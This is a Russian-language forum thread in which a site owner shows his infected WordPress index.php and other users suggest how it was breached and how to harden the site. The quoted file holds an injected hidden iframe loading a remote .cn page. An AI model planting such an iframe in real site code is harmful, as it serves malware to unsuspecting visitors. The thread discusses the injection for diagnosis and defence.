Мир Вам.
Зашел сегодня на свой сайт и антивирусник выдал, что сайт завирусован.
Стал копаться в коде, нашел iframe в файлах index.php главной сайта и админки.
Содержимое файла главной страницы:
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?><html><body><iframe src="http://thefilmmusic.cn/in" width=1 height=1 style="visibility: hidden"></iframe></body></html>>Т.е. дефейснули сайт, вставили фрэйм с вирусом.
В итоге задался вопросом, как такое может быть? Даже с последней версией вордпрес?
Спасибо и всех Вам Благ.
Проверьте комьютер, а так же файлы сайта на вирусы. Чаще всего пароли воруют именно при помощи внедрения вирусов/троянов в компьютер владельца сайта. А так же возможно воспользовались каким-нибудь плагинов с вирусом. Не забудьте сменить пароли к фтп серверу.
Последня версия ВП или не последняя, или сайт вообще на другой CMS, а правила одни и те же:
ставить правильные права на файлы 644 и папки 775 http://mywordpress.ru/support/viewtopic.php?id=1862
иметь антивирусник какой-нибудь, например касперского
не сохранять пароли от ftp в ftp-программе
Еще бывает, что не Вас, а хостера типа хакнули и во все сайты iframe насовали. Такая ситуация обычно диагностируется валом жалоб на форуме хостера 🙂
Спасибо за ответы.
2rM, на компьютере вирусов нет. Стоит два антивируса + файерволл, они то и увидели вирус на сайте.
Плагины и сайт в целом работают несколько месяцев, появилась проблема только сегодня.
2sonika, права выставлены правильно, проверил на 2 раза, пароли никакие не сменены, ввожу всегда вручную, длинна паролей минимум 8 буквенно-цифровых символов. Хостеру задал вопрос, жду официального ответа, у них ещё 3 моих сайта, никакиех вирусов.
Брутальный подбор паролей еще никто не отменял.
)) ну брутально подобрать пароль из 8 символов это круть.
Проще всунуть на комп кейлоггер и всех то проблем. Причем
его и антивирус не засечет.
Помимо антивируса, нужны еще файрволы, Ad-Aware SE + AVZ